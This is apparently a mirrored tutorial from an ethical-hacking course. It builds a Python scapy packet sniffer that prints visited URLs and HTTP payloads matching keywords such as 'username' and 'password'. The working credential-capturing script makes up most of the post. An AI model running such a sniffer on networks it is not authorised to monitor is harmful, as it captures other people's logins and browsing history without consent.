zoukankan html css js c++ java

Python Ethical Hacking

PACKET_SNIFFER

Capture data flowing through an interface.
Filter this data.
Display Interesting information such as:
- Login info(username&password).
- Visited websites.
- Images.
- ...etc

PACKET_SNIFFER

CAPTURE & FILTER DATA

scapy has a sniffer function.
Can capture data sent to/from iface.
Can call a function specified in prn on each packet.

Install the third party package.

pip install scapy_http

1. Write the Python to sniff all the Raw packets.

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import *

def sniff(interface):
    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):
    if packet.haslayer(HTTPRequest):
        if packet.haslayer(scapy.all.Raw):
            print(packet.show())

sniff("eth0")

Execute the script and sniff the packets on eth0.

2. Filter the useful packets

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import *

def sniff(interface):
    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):
    if packet.haslayer(HTTPRequest):
        if packet.haslayer(scapy.all.Raw):
            print(packet[scapy.all.Raw].load)

sniff("eth0")

Execute the script and sniff the packets on eth0.

Rewrite the Python Script to filter the keywords.

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import *


def sniff(interface):
    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def process_sniffed_packet(packet):
    if packet.haslayer(HTTPRequest):
        if packet.haslayer(scapy.all.Raw):
            load = packet[scapy.all.Raw].load.decode(errors='ignore')
            keywords = ["username", "user", "login", "password", "pass"]
            for keyword in keywords:
                if keyword in load:
                    print(load)
                    break


sniff("eth0")

Add the feature - Extracting URL

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import *


def sniff(interface):
    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def process_sniffed_packet(packet):
    if packet.haslayer(HTTPRequest):
        url = packet[HTTPRequest].Host + packet[HTTPRequest].Path
        print(url)

        if packet.haslayer(scapy.all.Raw):
            load = packet[scapy.all.Raw].load.decode(errors='ignore')
            keywords = ["username", "user", "login", "password", "pass"]
            for keyword in keywords:
                if keyword in load:
                    print(load)
                    break


sniff("eth0")

相信未来 - 该面对的绝不逃避，该执著的永不怨悔，该舍弃的不再留念，该珍惜的好好把握。

查看全文

相关阅读:
Score, ACM/ICPC Seoul 2005, UVa 1585
Score, ACM/ICPC Seoul 2005, UVa 1585
Molar Mass, ACM/ICPC Seoul 2007, UVa 1586
Molar Mass, ACM/ICPC Seoul 2007, UVa 1586
Digit Counting, ACM/ICPC Danang 2007, UVa 1225
Digit Counting, ACM/ICPC Danang 2007, UVa 1225
Periodic Strigs, UVa455
【开发技术】java+mysql 更改表字段的步骤
 【编程技巧】JAVA读取url地址中的文本内容
 【问题解决】java中为什么不建议使用DataInputStream 的readLine()方法

原文地址：https://www.cnblogs.com/keepmoving1113/p/11386213.html